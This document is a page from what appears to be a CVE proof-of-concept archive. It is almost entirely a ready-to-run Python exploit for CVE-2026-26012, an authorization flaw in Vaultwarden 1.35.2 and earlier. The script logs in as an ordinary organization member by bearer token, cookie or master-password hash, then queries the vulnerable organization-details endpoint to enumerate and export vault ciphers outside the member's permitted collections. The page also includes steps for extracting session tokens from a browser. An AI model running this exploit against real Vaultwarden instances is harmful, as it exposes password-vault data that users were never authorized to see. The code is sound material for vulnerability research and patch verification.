4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc_cve_2026_26012.py PY
#!/usr/bin/env python3
"""
CVE-2026-26012 - Vaultwarden Full Cipher Enumeration PoC
=========================================================
Affected: Vaultwarden <= 1.35.2
Fixed in: Vaultwarden 1.35.3
CVSS:     6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE:      CWE-863 (Incorrect Authorization)

Supports multiple authentication methods:
  - Bearer token (from SSO, 2FA, or manual extraction)
  - Session cookie
  - Direct password login (simple setups without SSO/2FA)

Usage examples:
  # With a Bearer token (recommended for SSO + 2FA setups)
  python3 poc_cve_2026_26012.py --url https://vw.example.com \
      --token "eyJhbGciOi..." --org-id <org-uuid>

  # With a session cookie
  python3 poc_cve_2026_26012.py --url https://vw.example.com \
      --cookie "VAULTWARDEN_SESSION=abc123..." --org-id <org-uuid>

  # With raw cookie header (multiple cookies)
  python3 poc_cve_2026_26012.py --url https://vw.example.com \
      --cookie-header "session=abc; token=xyz" --org-id <org-uuid>

  # Direct login (only works without SSO/2FA)
  python3 poc_cve_2026_26012.py --url https://vw.example.com \
      --email user@example.com --password "Password123" --org-id <org-uuid>

How to extract your token/cookie:
  1. Open your Vaultwarden web vault in a browser
  2. Log in normally (SSO + 2FA)
  3. Open DevTools (F12) -> Network tab
  4. Perform any action in the vault (e.g. click on a folder)
  5. Find an API request (e.g. /api/sync)
  6. Copy the "Authorization: Bearer <token>" header value
     OR copy the Cookie header value

Disclaimer:
  For authorized security testing and educational purposes only.
"""

import argparse
import json
import sys
import urllib.request
import urllib.error
import urllib.parse
import base64
import hashlib
import ssl


# ─────────────────────────────────────────────
# 1. HTTP Helper
# ─────────────────────────────────────────────

class VaultwardenClient:
    """HTTP client handling various auth methods for Vaultwarden API.

    Credentials are kept as ready-to-send header values (``auth_header`` and
    ``cookie_header``) and attached to every request by ``_build_request``.
    Every transport or HTTP failure is reported as ``RuntimeError`` so callers
    need only one ``except`` clause.
    """

    def __init__(self, base_url: str, verify_ssl: bool = True,
                 timeout: float = 30.0):
        """
        Args:
            base_url: Root URL of the instance; a trailing slash is stripped.
            verify_ssl: When False, certificate and hostname checks are
                disabled for HTTPS requests.
            timeout: Per-request socket timeout in seconds. ``None`` disables
                the timeout (requests may then block indefinitely).
        """
        self.base_url = base_url.rstrip("/")
        self.auth_header = None
        self.cookie_header = None
        self.timeout = timeout

        if not verify_ssl:
            self.ssl_ctx = ssl.create_default_context()
            self.ssl_ctx.check_hostname = False
            self.ssl_ctx.verify_mode = ssl.CERT_NONE
        else:
            self.ssl_ctx = None

    # ── Auth configuration ──

    def set_bearer_token(self, token: str):
        """Use a Bearer token (JWT) for authentication.

        Surrounding whitespace and an optional leading "Bearer " prefix
        (any letter case) are removed before the header value is stored.
        """
        token = token.strip()
        if token.lower().startswith("bearer "):
            token = token[7:]
        self.auth_header = f"Bearer {token}"

    def set_cookie(self, cookie: str):
        """Use a raw cookie string for authentication."""
        self.cookie_header = cookie.strip()

    def login_password(self, email: str, password: str):
        """
        Authenticate via password grant.
        NOTE: Only works for instances WITHOUT SSO and WITHOUT 2FA.
        For SSO/2FA setups, use --token or --cookie instead.

        Returns the decoded token response and stores its access token as the
        Bearer header. Any failure prints a diagnostic and exits the process
        with status 1.
        """
        # Step 1: Get KDF parameters
        try:
            prelogin_data = self._post_json(
                "/api/accounts/prelogin",
                {"email": email},
            )
        except RuntimeError as e:
            # Same policy as the token request below: report and stop instead
            # of letting a traceback escape.
            print(f"[!] Prelogin request failed: {e}")
            sys.exit(1)

        kdf_type = prelogin_data.get("kdf", prelogin_data.get("Kdf", 0))
        kdf_iterations = prelogin_data.get("kdfIterations",
                            prelogin_data.get("KdfIterations", 600000))

        print(f"    KDF type: {kdf_type}, iterations: {kdf_iterations}")

        # Step 2: Derive master password hash (PBKDF2-SHA256)
        if kdf_type == 0:  # PBKDF2
            # Master key: password stretched with the lower-cased email as salt.
            master_key = hashlib.pbkdf2_hmac(
                "sha256",
                password.encode("utf-8"),
                email.lower().encode("utf-8"),
                kdf_iterations,
                dklen=32,
            )
            # Login hash: one further round keyed by the master key, salted
            # with the password.
            master_password_hash = hashlib.pbkdf2_hmac(
                "sha256",
                master_key,
                password.encode("utf-8"),
                1,
                dklen=32,
            )
            b64_hash = base64.b64encode(master_password_hash).decode()
        else:
            print(f"[!] KDF type {kdf_type} (Argon2id) not supported in this PoC.")
            print("    Please authenticate via browser and use --token instead.")
            sys.exit(1)

        # Step 3: Request token
        payload = urllib.parse.urlencode({
            "grant_type": "password",
            "username": email,
            "password": b64_hash,
            "scope": "api offline_access",
            "client_id": "web",
            "deviceType": "9",
            "deviceIdentifier": "poc-cve-2026-26012",
            "deviceName": "PoC Script",
        })

        try:
            token_data = self._post_form("/identity/connect/token", payload)
            self.auth_header = f"Bearer {token_data['access_token']}"
            return token_data
        except Exception as e:
            # Classify the failure from the error text so the user gets an
            # actionable hint.
            error_msg = str(e)
            if "TwoFactor" in error_msg or "two_factor" in error_msg.lower():
                print("[!] 2FA is required. Cannot proceed with password login.")
                print("    Please authenticate via browser and use --token instead.")
                print("    See --help for instructions on extracting your token.")
            elif "sso" in error_msg.lower() or "redirect" in error_msg.lower():
                print("[!] SSO redirect detected. Cannot proceed with password login.")
                print("    Please authenticate via browser and use --token instead.")
            else:
                print(f"[!] Login failed: {error_msg}")
            sys.exit(1)

    # ── HTTP methods ──

    def _build_request(self, path: str, method: str = "GET",
                       data: bytes = None, content_type: str = None) -> urllib.request.Request:
        """Create a request for ``base_url + path`` carrying the configured
        Authorization and Cookie headers (whichever are set)."""
        url = f"{self.base_url}{path}"
        req = urllib.request.Request(url, data=data, method=method)
        req.add_header("Accept", "application/json")
        req.add_header("User-Agent", "Mozilla/5.0 (PoC CVE-2026-26012)")

        if content_type:
            req.add_header("Content-Type", content_type)
        if self.auth_header:
            req.add_header("Authorization", self.auth_header)
        if self.cookie_header:
            req.add_header("Cookie", self.cookie_header)

        return req

    def _do_request(self, req: urllib.request.Request) -> dict:
        """Send ``req`` and return the decoded JSON body.

        Returns:
            The parsed JSON value (a dict for object responses), or
            ``{"_status": <code>, "_empty": True}`` when the body is empty.

        Raises:
            RuntimeError: on an HTTP error status ("HTTP <code>: <body>"), a
                transport failure or timeout ("Connection error: ..."), an
                HTML body, or a body that is not valid JSON.
        """
        kwargs = {"timeout": self.timeout}
        if self.ssl_ctx:
            kwargs["context"] = self.ssl_ctx

        try:
            with urllib.request.urlopen(req, **kwargs) as resp:
                body = resp.read()
                content_type = resp.headers.get("Content-Type", "")
                status = resp.status
        except urllib.error.HTTPError as e:
            # Must precede URLError: HTTPError is a subclass of it.
            body = e.read().decode(errors="replace")
            raise RuntimeError(f"HTTP {e.code}: {body}") from e
        except urllib.error.URLError as e:
            # DNS failure, refused connection, TLS failure, unknown scheme...
            raise RuntimeError(f"Connection error: {e.reason}") from e
        except OSError as e:
            # Timeouts or resets raised while reading the response body are
            # not wrapped in URLError by urllib.
            raise RuntimeError(f"Connection error: {e}") from e

        if not body or len(body.strip()) == 0:
            # Empty body — return status info so callers can handle it
            return {"_status": status, "_empty": True}

        decoded = body.decode("utf-8", errors="replace").strip()

        # Check if response is actually JSON
        if decoded.startswith("<"):
            # Got HTML back (likely a redirect/login page)
            raise RuntimeError(
                f"HTTP {status}: Server returned HTML instead of JSON. "
                f"Your token/cookie may be invalid or expired, "
                f"or the server is redirecting to a login page."
            )

        try:
            return json.loads(decoded)
        except json.JSONDecodeError as e:
            # Non-JSON, non-HTML response
            raise RuntimeError(
                f"HTTP {status}: Unexpected response format "
                f"(Content-Type: {content_type}): {decoded[:200]}"
            ) from e

    def _post_json(self, path: str, obj: dict) -> dict:
        """POST ``obj`` serialized as JSON and return the decoded response."""
        data = json.dumps(obj).encode()
        req = self._build_request(path, "POST", data, "application/json")
        return self._do_request(req)

    def _post_form(self, path: str, form_data: str) -> dict:
        """POST an already URL-encoded form body and return the decoded response."""
        req = self._build_request(
            path, "POST", form_data.encode(), "application/x-www-form-urlencoded"
        )
        return self._do_request(req)

    def get(self, path: str) -> dict:
        """GET ``path`` and return the decoded response."""
        req = self._build_request(path)
        return self._do_request(req)


# ─────────────────────────────────────────────
# 2. Exploit functions
# ─────────────────────────────────────────────

def verify_auth(client: VaultwardenClient) -> dict:
    """
    Verify authentication by trying several endpoints.
    Different auth methods (token vs cookie) may respond differently.

    Returns:
        The user's profile dict when an endpoint exposes one; otherwise a
        placeholder dict with "email" and "name" keys (authenticated but no
        profile data, or unverified after every endpoint was inconclusive).

    Exits the process with status 1 on HTTP 401/403 or when the server
    answers with HTML, since those indicate unusable credentials.
    """
    # Try endpoints in order of reliability
    endpoints = [
        "/api/accounts/profile",
        "/api/sync?excludeDomains=true",
        "/api/accounts/revision-date",
    ]
    authenticated_placeholder = {
        "email": "(verified via revision-date)",
        "name": "(authenticated)",
    }

    last_error = None
    for endpoint in endpoints:
        try:
            data = client.get(endpoint)
        except RuntimeError as e:
            error_str = str(e)
            # HTTP failures are formatted "HTTP <code>: <body>"; match the
            # prefix so digits inside an unrelated error body cannot be
            # mistaken for a status code.
            if error_str.startswith("HTTP 401"):
                print("[!] Authentication failed (401 Unauthorized).")
                print("    Your token/cookie may be expired or invalid.")
                print("    Please re-authenticate and try again.")
                sys.exit(1)
            if error_str.startswith("HTTP 403"):
                print("[!] Authentication failed (403 Forbidden).")
                sys.exit(1)
            if "HTML instead of JSON" in error_str:
                print(f"[!] Server returned HTML for {endpoint}.")
                print("    Your token/cookie is likely invalid or expired.")
                print("    Please re-authenticate and try again.")
                sys.exit(1)
            last_error = error_str
            continue

        if data is None:
            last_error = f"Unexpected response format from {endpoint}"
            continue

        if not isinstance(data, dict):
            # A bare JSON value (number, string, list): the request was
            # accepted, so auth works, but there is no profile to report.
            return dict(authenticated_placeholder)

        # Handle empty response (token may work but endpoint returns nothing)
        if data.get("_empty"):
            last_error = f"Empty response from {endpoint}"
            continue

        # /api/sync wraps profile in "profile" key
        if "profile" in data or "Profile" in data:
            profile = data.get("profile", data.get("Profile", data))
            if isinstance(profile, dict):
                return profile

        # /api/accounts/profile returns profile directly
        if "email" in data or "Email" in data or "id" in data or "Id" in data:
            return data

        # Any other JSON object: auth works but we don't have profile info
        return dict(authenticated_placeholder)

    # If all endpoints returned empty but no hard error, auth might still work
    # (some setups return empty for profile but the token is valid)
    print(f"[~] Warning: Could not verify profile ({last_error})")
    print("    Proceeding anyway — if requests fail, your auth may be invalid.")
    return {"email": "(unverified)", "name": "(unverified)"}


def get_user_collections(client: VaultwardenClient, org_id: str) -> list:
    """Retrieve the collections the authenticated user has access to.

    Requests ``/api/organizations/<org_id>/collections`` and accepts either a
    wrapper object with a "data"/"Data" list or a bare JSON list.

    Returns:
        A list of collection dicts. The list is empty when the request fails,
        the body is empty, or the payload has an unexpected shape, so callers
        can always iterate the result.
    """
    try:
        data = client.get(f"/api/organizations/{org_id}/collections")
    except RuntimeError as e:
        print(f"[!] Could not fetch collections: {e}")
        return []

    if isinstance(data, dict):
        if data.get("_empty"):
            print("[!] Empty response fetching collections — org-id may be wrong")
            return []
        data = data.get("data", data.get("Data", []))

    if not isinstance(data, list):
        # e.g. "data": null — never hand a non-iterable back to the caller.
        return []
    # Callers use .get() on each entry, so drop anything that is not an object.
    return [entry for entry in data if isinstance(entry, dict)]


def exploit_org_details(client: VaultwardenClient, org_id: str) -> list:
    """
    Call the vulnerable endpoint:
      GET /api/ciphers/organization-details?organizationId=<org_id>

    Vulnerable behaviour (<= 1.35.2): returns ALL ciphers in the org
    regardless of collection-level access control.

    Returns:
        A list of cipher dicts, taken from the "data"/"Data" field of the
        response or from a bare JSON list; empty when the body is empty or
        has an unexpected shape.

    Exits the process with status 1 when the request itself fails.
    """
    try:
        data = client.get(
            f"/api/ciphers/organization-details?organizationId={org_id}"
        )
    except RuntimeError as e:
        # HTTP failures are formatted "HTTP <code>: <body>"; match the prefix
        # rather than searching the whole body for the digits.
        if str(e).startswith(("HTTP 401", "HTTP 403")):
            print("[!] Access denied to organization-details endpoint.")
            print("    You may not be a member of this organization,")
            print("    or the server is patched (>= 1.35.3).")
        else:
            print(f"[!] Exploit request failed: {e}")
        sys.exit(1)

    if isinstance(data, dict):
        if data.get("_empty"):
            print("[!] Empty response from organization-details endpoint.")
            return []
        data = data.get("data", data.get("Data", data))

    if not isinstance(data, list):
        return []
    # Later analysis calls .get() on every cipher; keep only JSON objects.
    return [cipher for cipher in data if isinstance(cipher, dict)]


def get_user_accessible_ciphers(client: VaultwardenClient, org_id: str) -> list:
    """
    Fetch ciphers via the normal /api/sync endpoint to compare what the
    user is *supposed* to see vs what the vulnerable endpoint returns.

    Returns:
        The cipher dicts from the sync response whose organization id equals
        ``org_id``. An empty list is returned when the request fails or the
        body is empty or malformed; a failed request additionally prints a
        warning, because an empty baseline makes every cipher look absent
        from sync in the later comparison.
    """
    try:
        data = client.get("/api/sync?excludeDomains=true")
    except RuntimeError as e:
        print(f"[~] Warning: Could not fetch /api/sync ({e})")
        print("    The sync-based comparison will be unreliable.")
        return []

    if not isinstance(data, dict) or data.get("_empty"):
        return []

    all_ciphers = data.get("ciphers", data.get("Ciphers", []))
    if not isinstance(all_ciphers, list):
        # e.g. "ciphers": null
        return []

    return [
        c for c in all_ciphers
        if isinstance(c, dict)
        and c.get("organizationId", c.get("OrganizationId")) == org_id
    ]


# ─────────────────────────────────────────────
# 3. Analysis & Reporting
# ─────────────────────────────────────────────

def analyze_results(vuln_ciphers: list, legit_ciphers: list,
                    accessible_collection_ids: set):
    """
    Compare ciphers from the vulnerable endpoint vs. legitimate access.
    Two complementary detection methods:
      1. By collection: ciphers in collections the user cannot access
      2. By sync diff: ciphers not present in the normal /api/sync response

    Args:
        vuln_ciphers: Cipher dicts returned by the vulnerable endpoint.
        legit_ciphers: Cipher dicts returned by /api/sync for the same org.
        accessible_collection_ids: Ids of collections the user may access.

    Returns:
        ``(legitimate, leaked)`` — two lists partitioning ``vuln_ciphers`` in
        their original order.

    Side effect:
        Each leaked cipher dict is modified in place: a "_leak_reason" list
        containing "restricted_collection" and/or "absent_from_sync" is added.
    """
    legit_cipher_ids = {c.get("id", c.get("Id")) for c in legit_ciphers}
    leaked = []
    legitimate = []

    for cipher in vuln_ciphers:
        cipher_id = cipher.get("id", cipher.get("Id"))
        # `or` chain rather than nested defaults: an explicit null value for
        # the key must behave like "no collections" instead of crashing set().
        cipher_collections = set(
            cipher.get("collectionIds") or cipher.get("CollectionIds") or []
        )

        # A cipher without any collection is never flagged by this method.
        in_restricted_collection = bool(cipher_collections) and (
            cipher_collections.isdisjoint(accessible_collection_ids)
        )
        not_in_sync = cipher_id not in legit_cipher_ids

        reasons = []
        if in_restricted_collection:
            reasons.append("restricted_collection")
        if not_in_sync:
            reasons.append("absent_from_sync")

        if reasons:
            cipher["_leak_reason"] = reasons
            leaked.append(cipher)
        else:
            legitimate.append(cipher)

    return legitimate, leaked


def print_cipher_summary(cipher: dict, index: int):
    """Write a short, human-readable description of one cipher to stdout.

    Fields are read under either their camelCase or PascalCase key. Login
    details (password/TOTP presence, URI count) are shown only for type 1
    ciphers, and the attachment count only when attachments exist.

    Args:
        cipher: Cipher dict as returned by the API, optionally carrying a
            "_leak_reason" list.
        index: Number shown in the entry header.
    """
    def pick(record: dict, lower: str, upper: str, fallback=None):
        # Presence-based lookup: the first key wins even if its value is falsy.
        return record.get(lower, record.get(upper, fallback))

    def first_truthy(record: dict, lower: str, upper: str):
        # Truthiness-based lookup: a null/empty first value falls through.
        return record.get(lower) or record.get(upper)

    ident = pick(cipher, "id", "Id", "N/A")
    kind = pick(cipher, "type", "Type", "?")
    labels = {1: "Login", 2: "SecureNote", 3: "Card", 4: "Identity"}
    kind_label = labels.get(kind, f"Unknown({kind})")

    title = str(pick(cipher, "name", "Name", "N/A"))
    member_of = pick(cipher, "collectionIds", "CollectionIds", [])
    reasons = cipher.get("_leak_reason", [])
    revised = pick(cipher, "revisionDate", "RevisionDate", "N/A")

    login = first_truthy(cipher, "login", "Login") or {}
    uri_list = first_truthy(login, "uris", "Uris") or []
    password_present = bool(first_truthy(login, "password", "Password"))
    totp_present = bool(first_truthy(login, "totp", "Totp"))
    files = first_truthy(cipher, "attachments", "Attachments") or []

    # Names longer than 70 characters are cut and marked with an ellipsis.
    suffix = "..." if len(title) > 70 else ""

    out = [
        f"  [{index}]",
        f"    ID:            {ident}",
        f"    Type:          {kind_label}",
        f"    Name (enc):    {title[:70]}{suffix}",
        f"    Collections:   {member_of}",
        f"    Revision:      {revised}",
        f"    Leak reason:   {', '.join(reasons)}",
    ]
    if kind == 1:
        out.append(f"    Has password:  {'Yes' if password_present else 'No'}")
        out.append(f"    Has TOTP:      {'Yes' if totp_present else 'No'}")
        out.append(f"    URIs count:    {len(uri_list)}")
    if files:
        out.append(f"    Attachments:   {len(files)}")
    out.append("    ---")

    print("\n".join(out))


# ─────────────────────────────────────────────
# 4. Main
# ─────────────────────────────────────────────

def main():
    """Command-line entry point.

    Parses arguments, configures exactly one authentication method, queries
    the collections, /api/sync and organization-details endpoints, prints a
    comparison report and optionally writes it to a JSON file.

    Returns:
        1 when at least one cipher was classified as leaked, otherwise 0.
        The process exits early through ``sys.exit``/``parser.error`` on
        invalid arguments, failed authentication or an empty result.
    """
    banner = r"""
   ╔══════════════════════════════════════════════════════════╗
   ║       CVE-2026-26012 — Vaultwarden PoC                  ║
   ║  Full Cipher Enumeration via /organization-details       ║
   ║  Affected: <= 1.35.2 | Fixed: 1.35.3                    ║
   ╚══════════════════════════════════════════════════════════╝
    """
    print(banner)

    parser = argparse.ArgumentParser(
        description="CVE-2026-26012 - Vaultwarden Cipher Enumeration PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Authentication methods (use ONE):
  --token TOKEN       Bearer/JWT token (recommended for SSO + 2FA)
  --cookie COOKIE     Session cookie value
  --cookie-header HDR Raw Cookie header (multiple cookies)
  --email + --password  Direct login (no SSO, no 2FA only)

How to extract your Bearer token:
  1. Log into Vaultwarden web vault (complete SSO + 2FA)
  2. Open browser DevTools (F12) -> Network tab
  3. Click any item in the vault to trigger an API call
  4. Find a request to /api/... and copy the Authorization header
     Example: "Bearer eyJhbGciOiJSUzI1NiIs..."
  5. Pass the token value (with or without "Bearer " prefix)

How to extract your session cookie:
  1. Log into Vaultwarden web vault
  2. Open DevTools (F12) -> Application -> Cookies
  3. Copy the relevant cookie(s)
  OR: In Network tab, copy the full Cookie header from any request
        """,
    )

    parser.add_argument("--url", required=True,
                        help="Vaultwarden base URL (e.g. https://vw.example.com)")
    parser.add_argument("--org-id", required=True,
                        help="Target organization UUID")

    auth = parser.add_argument_group("Authentication (choose one)")
    auth.add_argument("--token",
                      help="Bearer/JWT token (from browser DevTools)")
    auth.add_argument("--cookie",
                      help="Session cookie value (name=value)")
    auth.add_argument("--cookie-header",
                      help="Raw Cookie header string (multiple cookies)")
    auth.add_argument("--email",
                      help="Email (for direct password login, no SSO/2FA)")
    auth.add_argument("--password",
                      help="Master password (for direct password login)")

    parser.add_argument("--output", default=None,
                        help="Save full JSON results to file")
    parser.add_argument("--no-verify-ssl", action="store_true",
                        help="Skip SSL certificate verification")
    parser.add_argument("--show-all", action="store_true",
                        help="Show all ciphers, not just leaked ones")
    parser.add_argument("--max-display", type=int, default=20,
                        help="Max leaked ciphers to display (default: 20)")

    args = parser.parse_args()

    # ── Validate auth ──
    # Each flag is True when that method's arguments were supplied; exactly
    # one method must be selected.
    has_token = bool(args.token)
    has_cookie = bool(args.cookie or args.cookie_header)
    has_password = bool(args.email and args.password)
    auth_methods = sum([has_token, has_cookie, has_password])

    if auth_methods == 0:
        parser.error(
            "No authentication provided. Use --token, --cookie, "
            "--cookie-header, or --email + --password.\n"
            "For SSO + 2FA setups, use --token (see --help)."
        )
    if auth_methods > 1:
        parser.error("Please use only one authentication method.")

    # ── Init client ──
    client = VaultwardenClient(args.url, verify_ssl=not args.no_verify_ssl)

    # ── Configure auth ──
    if has_token:
        print("[*] Authentication method: Bearer token")
        client.set_bearer_token(args.token)
    elif args.cookie_header:
        print("[*] Authentication method: Cookie header")
        client.set_cookie(args.cookie_header)
    elif args.cookie:
        print("[*] Authentication method: Session cookie")
        client.set_cookie(args.cookie)
    elif has_password:
        print(f"[*] Authentication method: Password login as {args.email}")
        print("    (Note: won't work with SSO or 2FA enabled)")
        client.login_password(args.email, args.password)

    # ── Step 1: Verify auth ──
    print("[*] Verifying authentication...")
    profile = verify_auth(client)
    user_email = profile.get("email", profile.get("Email", "unknown"))
    user_name = profile.get("name", profile.get("Name", "unknown"))
    print(f"[+] Authenticated as: {user_name} ({user_email})")

    # ── Step 2: Get legitimate collections ──
    org_id = args.org_id
    print(f"\n[*] Fetching accessible collections for org {org_id[:8]}...")
    collections = get_user_collections(client, org_id)
    accessible_ids = {c.get("id", c.get("Id")) for c in collections}
    print(f"[+] User has access to {len(accessible_ids)} collection(s)")
    for c in collections:
        coll_name = c.get("name", c.get("Name", c.get("id", "?")))
        coll_id = c.get("id", c.get("Id", "?"))
        # str() keeps the slice valid if the server sends a null/non-string id.
        print(f"    - {coll_name} ({str(coll_id)[:8]}...)")

    # ── Step 3: Get legitimate ciphers via /api/sync ──
    print(f"\n[*] Fetching legitimate ciphers via /api/sync...")
    legit_ciphers = get_user_accessible_ciphers(client, org_id)
    print(f"[+] User can legitimately see {len(legit_ciphers)} cipher(s) in this org")

    # ── Step 4: Exploit ──
    print(f"\n[*] Calling vulnerable endpoint /api/ciphers/organization-details...")
    vuln_ciphers = exploit_org_details(client, org_id)
    total = len(vuln_ciphers)
    print(f"[+] Vulnerable endpoint returned {total} cipher(s)")

    if total == 0:
        print("[!] No ciphers returned. The org may be empty or the endpoint is restricted.")
        sys.exit(0)

    # ── Step 5: Analyze ──
    legitimate, leaked = analyze_results(vuln_ciphers, legit_ciphers, accessible_ids)

    print(f"\n{'='*60}")
    print(f"  RESULTS")
    print(f"{'='*60}")
    print(f"  Ciphers via /sync (legitimate):        {len(legit_ciphers)}")
    print(f"  Ciphers via /organization-details:      {total}")
    print(f"  Difference (leaked):                    {len(leaked)}")
    print(f"{'='*60}")

    if leaked:
        print(f"\n  [!!] VULNERABLE — {len(leaked)} cipher(s) leaked\n")
        # Clamp at zero: a negative --max-display would otherwise slice from
        # the end of the list and miscount the remainder.
        display_count = max(0, min(len(leaked), args.max_display))
        for i, cipher in enumerate(leaked[:display_count], 1):
            print_cipher_summary(cipher, i)
        if len(leaked) > display_count:
            print(f"\n  ... and {len(leaked) - display_count} more."
                  f" Use --output to export all.")
    else:
        print(f"\n  [OK] NOT VULNERABLE (or user has access to all collections)")
        print(f"       Both endpoints returned the same ciphers.")
        print(f"       The server may be patched (>= 1.35.3).")

    if args.show_all and legitimate:
        print(f"\n  --- Legitimately accessible ciphers ({len(legitimate)}) ---\n")
        for i, cipher in enumerate(legitimate, 1):
            print_cipher_summary(cipher, i)

    # ── Step 6: Export ──
    if args.output:
        # Remove the analysis-only annotation so exported ciphers contain
        # just the fields the server returned.
        for c in leaked:
            c.pop("_leak_reason", None)
        output_data = {
            "vulnerability": "CVE-2026-26012",
            "target": args.url,
            "organization_id": org_id,
            "authenticated_as": user_email,
            "accessible_collections": len(accessible_ids),
            "ciphers_via_sync": len(legit_ciphers),
            "ciphers_via_vuln_endpoint": total,
            "leaked_count": len(leaked),
            "is_vulnerable": len(leaked) > 0,
            "leaked_cipher_ids": [c.get("id", c.get("Id")) for c in leaked],
            "leaked_ciphers": leaked,
        }
        # ensure_ascii=False emits raw non-ASCII characters, so the file must
        # be opened as UTF-8 instead of the locale's default encoding.
        with open(args.output, "w", encoding="utf-8") as f:
            json.dump(output_data, f, indent=2, ensure_ascii=False)
        print(f"\n[+] Full results saved to {args.output}")

    print("\n[*] Done.")
    return 1 if leaked else 0


# Run the PoC only when executed as a script (not on import). main()'s return
# value — 1 if leaked ciphers were found, otherwise 0 — becomes the exit status.
if __name__ == "__main__":
    sys.exit(main())